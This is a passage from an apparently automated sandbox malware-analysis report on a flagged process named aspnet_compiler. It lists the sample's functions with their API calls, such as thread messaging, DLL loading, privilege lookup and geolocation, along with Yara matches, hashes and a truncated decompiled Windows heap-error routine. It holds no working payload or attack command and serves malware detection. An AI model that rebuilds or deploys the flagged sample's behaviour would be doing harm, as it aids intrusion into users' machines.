                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: e07f623ee5e0f6990b956a99e51068ee7ccd64feffbe0fe51a0bfb17b2f274d6
                                                                                        • Instruction ID: 425e514c0d959417af2443d6bc7613e2f5ab4b53095a4d0499d9b187a3b4f36e
                                                                                        • Opcode Fuzzy Hash: e07f623ee5e0f6990b956a99e51068ee7ccd64feffbe0fe51a0bfb17b2f274d6
                                                                                        • Instruction Fuzzy Hash: 6C90027131154402D51461D995087160045A7D1281F51C415B4815658DC7D588A17162
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011D9660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: b86d5608fc97f04f49d7578bc6d0b534aab6bb2db7b8bdc6eea7dd69b2b063fa
                                                                                        • Instruction ID: 6969e406cf3151af9175ec95120429b521d3f0e3b85dcbd6038ed7d65a04ff69
                                                                                        • Opcode Fuzzy Hash: b86d5608fc97f04f49d7578bc6d0b534aab6bb2db7b8bdc6eea7dd69b2b063fa
                                                                                        • Instruction Fuzzy Hash: 5D90027120140802D58471D9550865A0045A7D1381F91C019B4016754DCB558A6977E1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011D96E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 377215fd3e07dc70271e1993c71c230b478019250acb6f16ab79a0e93ecee04a
                                                                                        • Instruction ID: 2ad1cc73137aa3abedd02aeaf1942127c34011eb07b72ae56874253139e7817f
                                                                                        • Opcode Fuzzy Hash: 377215fd3e07dc70271e1993c71c230b478019250acb6f16ab79a0e93ecee04a
                                                                                        • Instruction Fuzzy Hash: 7D90027120148802D51461D9950875A0045A7D0381F55C415B8415758DC7D588A17161
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00408E2F Relevance: 1.6, APIs: 1, Instructions: 57threadwindowCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 248 408e2f-408e81 call 41fbc7 call 4207a7 call 40c3d7 call 418b37 257 408e83-408e95 PostThreadMessageW 248->257 258 408eb5-408eb9 248->258 259 408eb4 257->259 260 408e97-408eb1 call 40bb37 257->260 259->258 260->259
                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 00408E91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.399292071.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_401000_aspnet_compiler.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID:
                                                                                        • API String ID: 1836367815-0
                                                                                        • Opcode ID: ee2f673cd7c41bedb7329c467a61dcf752a44aaeff7aacae688414327770de01
                                                                                        • Instruction ID: 3b0ae58093e7f5ee081f585ac65ab34d550f4f782d5797e02243572e7f2e12c6
                                                                                        • Opcode Fuzzy Hash: ee2f673cd7c41bedb7329c467a61dcf752a44aaeff7aacae688414327770de01
                                                                                        • Instruction Fuzzy Hash: 5401DD31A4022477E72066919C43FFE776C9B41B55F04412EFF04FA1C5EAB8690647E9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00408E37 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 263 408e37-408e46 264 408e4f-408e81 call 4207a7 call 40c3d7 call 418b37 263->264 265 408e4a call 41fbc7 263->265 272 408e83-408e95 PostThreadMessageW 264->272 273 408eb5-408eb9 264->273 265->264 274 408eb4 272->274 275 408e97-408eb1 call 40bb37 272->275 274->273 275->274
                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 00408E91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.399292071.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_401000_aspnet_compiler.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID:
                                                                                        • API String ID: 1836367815-0
                                                                                        • Opcode ID: e234b5ef6149ec5d9ec8b85547379579ec60ef49a0de639222c57309a22cb2bb
                                                                                        • Instruction ID: d598beaf437247ddd1467d48c584d11f144fb8d49ecfff8e0f2660f5f48ba532
                                                                                        • Opcode Fuzzy Hash: e234b5ef6149ec5d9ec8b85547379579ec60ef49a0de639222c57309a22cb2bb
                                                                                        • Instruction Fuzzy Hash: 5E018871A8022877E720A6959C43FFF766C5B40B55F04412EFF04BA1C1EAA8790646E9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040C3D7 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 292 40c3d7-40c400 call 4209f7 295 40c402-40c405 292->295 296 40c406-40c414 call 420e17 292->296 299 40c424-40c435 call 41f137 296->299 300 40c416-40c421 call 421097 296->300 305 40c437-40c44b LdrLoadDll 299->305 306 40c44e-40c451 299->306 300->299 305->306
                                                                                        APIs
                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040C449
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.399292071.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_401000_aspnet_compiler.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Load
                                                                                        • String ID:
                                                                                        • API String ID: 2234796835-0
                                                                                        • Opcode ID: b69180f9a1fc42f5ece30d713381e45914be3e31c3ae05bfe790bc91725e4840
                                                                                        • Instruction ID: 5f162280d857614098302719a640af2808658dc7a983362ac7032cebc4b5d2eb
                                                                                        • Opcode Fuzzy Hash: b69180f9a1fc42f5ece30d713381e45914be3e31c3ae05bfe790bc91725e4840
                                                                                        • Instruction Fuzzy Hash: 3E0152B5E4010DE7DF10DBA5DC42FEEB3B8AF14304F1042A5E908A7281F635EB588B55
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041E26E Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 307 41e26e-41e276 308 41e278-41e29f call 41eb97 ExitProcess 307->308 309 41e2cd-41e2ff 307->309
                                                                                        APIs
                                                                                        • ExitProcess.KERNEL32(?,00000000,000000E2,?,?,00000001), ref: 0041E29F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.399292071.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_401000_aspnet_compiler.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExitProcess
                                                                                        • String ID:
                                                                                        • API String ID: 621844428-0
                                                                                        • Opcode ID: 4b364272e006af264e2bb7398ebc7cd025ab8eac32dd32704314bae62cd5b784
                                                                                        • Instruction ID: d2ec5d099695f23975a0105c8664d33d2717c6699eb58a3e8e22aa59f27aeaed
                                                                                        • Opcode Fuzzy Hash: 4b364272e006af264e2bb7398ebc7cd025ab8eac32dd32704314bae62cd5b784
                                                                                        • Instruction Fuzzy Hash: B50112B6204108ABCB14DF99DC95EEB77ADAF8C754F018649FE5C9B242C630E941CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041E22A Relevance: 1.5, APIs: 1, Instructions: 27memoryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 323 41e22a-41e24e call 41eb97 325 41e253-41e268 RtlFreeHeap 323->325
                                                                                        APIs
                                                                                        • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 0041E264
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.399292071.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_401000_aspnet_compiler.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FreeHeap
                                                                                        • String ID:
                                                                                        • API String ID: 3298025750-0
                                                                                        • Opcode ID: 33ac012989b6b38b20fe75eae43b70e4167c2fec29589a974508570b9cbd4847
                                                                                        • Instruction ID: 11aa70d77f08e53e6abe2ac1f53569948597e4b78554c94827c96907b322320c
                                                                                        • Opcode Fuzzy Hash: 33ac012989b6b38b20fe75eae43b70e4167c2fec29589a974508570b9cbd4847
                                                                                        • Instruction Fuzzy Hash: 4EF039B5644214ABDB18EF49EC4AEEB7BBCEF84350F108559FA095B251C630E918CBB1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041E392 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 326 41e392-41e3b1 call 41eb97 328 41e3b6-41e3cb LookupPrivilegeValueW 326->328
                                                                                        APIs
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040F449,0040F449,?,00000000,?,?), ref: 0041E3C7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.399292071.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_401000_aspnet_compiler.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LookupPrivilegeValue
                                                                                        • String ID:
                                                                                        • API String ID: 3899507212-0
                                                                                        • Opcode ID: 9524396d80443591eedf9a296ad2aefb63e2895d1038800b0b285120f173c4d2
                                                                                        • Instruction ID: a913ed1f614fc1254e82e8ce276c8e222afc212d6cb7904579e98c5d1da1a3e9
                                                                                        • Opcode Fuzzy Hash: 9524396d80443591eedf9a296ad2aefb63e2895d1038800b0b285120f173c4d2
                                                                                        • Instruction Fuzzy Hash: 46E09AB66002086BCB10EF49CC41EE737ADAF88760F118058BE0C5B242C230E800CBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041E1F7 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(004181ED,?,00418994,00418994,?,004181ED,?,?,?,?,?,00000000,00000005,00000206), ref: 0041E224
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.399292071.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_401000_aspnet_compiler.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        • Opcode ID: 71d30878ffc0fd6371cee718eb9878eb3463dfa7e001799ef66c66478ee65a27
                                                                                        • Instruction ID: b7217d4b9aff619b6b878caa81aca477790b10bf4cb31abdb49de01a6c2d5899
                                                                                        • Opcode Fuzzy Hash: 71d30878ffc0fd6371cee718eb9878eb3463dfa7e001799ef66c66478ee65a27
                                                                                        • Instruction Fuzzy Hash: 1AE046B5200218ABDB18EF9ADC45EE73BACEF88754F018559FE095B242C630F910CBB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041E237 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 0041E264
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.399292071.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_401000_aspnet_compiler.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FreeHeap
                                                                                        • String ID:
                                                                                        • API String ID: 3298025750-0
                                                                                        • Opcode ID: 7383604f3fe5c795b9236c36b71377a732ea8f0b598dae172b24566b996ec6fa
                                                                                        • Instruction ID: c815c5cd5324823e81fc1c38a3d6d0c221f073dc52b94a92161811f6f07a444f
                                                                                        • Opcode Fuzzy Hash: 7383604f3fe5c795b9236c36b71377a732ea8f0b598dae172b24566b996ec6fa
                                                                                        • Instruction Fuzzy Hash: 1AE04FB52002146BD714DF49DC49ED73BACEF88754F014555FE0957242C530F914CBB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041E397 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040F449,0040F449,?,00000000,?,?), ref: 0041E3C7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.399292071.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_401000_aspnet_compiler.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LookupPrivilegeValue
                                                                                        • String ID:
                                                                                        • API String ID: 3899507212-0
                                                                                        • Opcode ID: 6915fa93d7270e13bfd703e99c47af289f1ee2615e020f739a89d4d612532f61
                                                                                        • Instruction ID: 0d009a4c28d2e78ee797871a9d3a0966a65aa83071acb2bdb2e4229ed7fd4aeb
                                                                                        • Opcode Fuzzy Hash: 6915fa93d7270e13bfd703e99c47af289f1ee2615e020f739a89d4d612532f61
                                                                                        • Instruction Fuzzy Hash: A1E01AB52002186BD710DF49CC45EE737ADAF88654F118559BE0957242C630F8108AB5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040F5F7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetUserGeoID.KERNELBASE(00000010), ref: 0040F621
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.399292071.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_401000_aspnet_compiler.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: User
                                                                                        • String ID:
                                                                                        • API String ID: 765557111-0
                                                                                        • Opcode ID: 9444abcb8007581e143bc9cb5ab68f040a4d32c968557aab41093c7ba48b8e71
                                                                                        • Instruction ID: 40f76a7ce721719412d85369e621cd45ccd7fc2708d0183768c235a3bd1a14d5
                                                                                        • Opcode Fuzzy Hash: 9444abcb8007581e143bc9cb5ab68f040a4d32c968557aab41093c7ba48b8e71
                                                                                        • Instruction Fuzzy Hash: 18E02B7338030427F630D1E59C42FB6324E5BC4704F088474F90CE77C1D5A9F5800018
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041E1BD Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(004181ED,?,00418994,00418994,?,004181ED,?,?,?,?,?,00000000,00000005,00000206), ref: 0041E224
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.399292071.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_401000_aspnet_compiler.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        • Opcode ID: 92e92f4788ccf9663bab056ccdb88cd0e8858e727fc4433ec8aa42c606b0010d
                                                                                        • Instruction ID: 2ab4fa8a3bd7d5bb10c96e42210b34d8843c97ab33be0773f3b394404cc9f590
                                                                                        • Opcode Fuzzy Hash: 92e92f4788ccf9663bab056ccdb88cd0e8858e727fc4433ec8aa42c606b0010d
                                                                                        • Instruction Fuzzy Hash: FED017BA1001246BDB14EF5ADC48DEB77ACEF88314B01895AFD1D93202C534E8158BB4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041E277 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ExitProcess.KERNEL32(?,00000000,000000E2,?,?,00000001), ref: 0041E29F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.399292071.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_401000_aspnet_compiler.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExitProcess
                                                                                        • String ID:
                                                                                        • API String ID: 621844428-0
                                                                                        • Opcode ID: 0c6232b6cdbf6635767260dc15682acedaa1cab9f782f361699728f7b20cdda3
                                                                                        • Instruction ID: ec4760e97ea34c4893b4c2f0f1c3c0839a63adc064fb9e7b2d885e1f18e7e498
                                                                                        • Opcode Fuzzy Hash: 0c6232b6cdbf6635767260dc15682acedaa1cab9f782f361699728f7b20cdda3
                                                                                        • Instruction Fuzzy Hash: 9BD0C2712002187BC620DB89CC45FD33B9CDF44794F004065BA0C5B242C530BA00C7E0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011D967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 436f0270ac8dfa62d7f09ab74aaa51322d36e3708f67f28af40cf16fed3741c1
                                                                                        • Instruction ID: 4e8a61392e1b1ddecc56631df4ba4584790c9d1e574bd61a8d024fd3fc3ce2ab
                                                                                        • Opcode Fuzzy Hash: 436f0270ac8dfa62d7f09ab74aaa51322d36e3708f67f28af40cf16fed3741c1
                                                                                        • Instruction Fuzzy Hash: 40B09BB19014C5C5DA15D7F4570C727794077D0745F16C055E1020745B477CC491F6B5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Non-executed Functions

                                                                                        Function 0124B260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • *** Resource timeout (%p) in %ws:%s, xrefs: 0124B352
                                                                                        • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0124B38F
                                                                                        • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0124B3D6
                                                                                        • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0124B2DC
                                                                                        • *** Inpage error in %ws:%s, xrefs: 0124B418
                                                                                        • *** An Access Violation occurred in %ws:%s, xrefs: 0124B48F
                                                                                        • write to, xrefs: 0124B4A6
                                                                                        • *** then kb to get the faulting stack, xrefs: 0124B51C
                                                                                        • a NULL pointer, xrefs: 0124B4E0
                                                                                        • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0124B53F
                                                                                        • The resource is owned shared by %d threads, xrefs: 0124B37E
                                                                                        • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0124B314
                                                                                        • read from, xrefs: 0124B4AD, 0124B4B2
                                                                                        • Go determine why that thread has not released the critical section., xrefs: 0124B3C5
                                                                                        • This failed because of error %Ix., xrefs: 0124B446
                                                                                        • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0124B39B
                                                                                        • *** enter .exr %p for the exception record, xrefs: 0124B4F1
                                                                                        • The critical section is owned by thread %p., xrefs: 0124B3B9
                                                                                        • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0124B476
                                                                                        • The instruction at %p referenced memory at %p., xrefs: 0124B432
                                                                                        • The instruction at %p tried to %s , xrefs: 0124B4B6
                                                                                        • *** enter .cxr %p for the context, xrefs: 0124B50D
                                                                                        • The resource is owned exclusively by thread %p, xrefs: 0124B374
                                                                                        • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0124B484
                                                                                        • <unknown>, xrefs: 0124B27E, 0124B2D1, 0124B350, 0124B399, 0124B417, 0124B48E
                                                                                        • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0124B2F3
                                                                                        • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0124B323
                                                                                        • an invalid address, %p, xrefs: 0124B4CF
                                                                                        • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0124B47D
                                                                                        • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0124B305
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                        • API String ID: 0-108210295
                                                                                        • Opcode ID: a7b6ee6d32b6014d66013c926861ba1fb34fa45c58569fcd682f945af1725640
                                                                                        • Instruction ID: 55c81f6ee923a1e1ec98ff0aefe465ee4f9e83ba219481d6968cea91f77683d2
                                                                                        • Opcode Fuzzy Hash: a7b6ee6d32b6014d66013c926861ba1fb34fa45c58569fcd682f945af1725640
                                                                                        • Instruction Fuzzy Hash: DA810275A60221FFDF2E6B4AAC46EBF3F25EF56A51F408048F6046B152D3A1C401DBB2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01251C06 Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 44%
                                                                                        			E01251C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x11748a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0119B150();
				} else {
					E0119B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x128589c);
				E0119B150("Heap error detected at %p (heap handle %p)\n",  *0x12858a0);
				_t27 =  *0x1285898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01251E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0119B150();
				} else {
					E0119B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0119B150("Error code: %d - %s\n",  *0x1285898);
				_t113 =  *0x12858a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0119B150();
					} else {
						E0119B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0119B150("Parameter1: %p\n",  *0x12858a4);
				}
				_t115 =  *0x12858a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0119B150();
					} else {
						E0119B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0119B150("Parameter2: %p\n",  *0x12858a8);
				}
				_t117 =  *0x12858ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0119B150();
					} else {
						E0119B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0119B150("Parameter3: %p\n",  *0x12858ac);
				}
				_t119 =  *0x12858b0; // 0x0
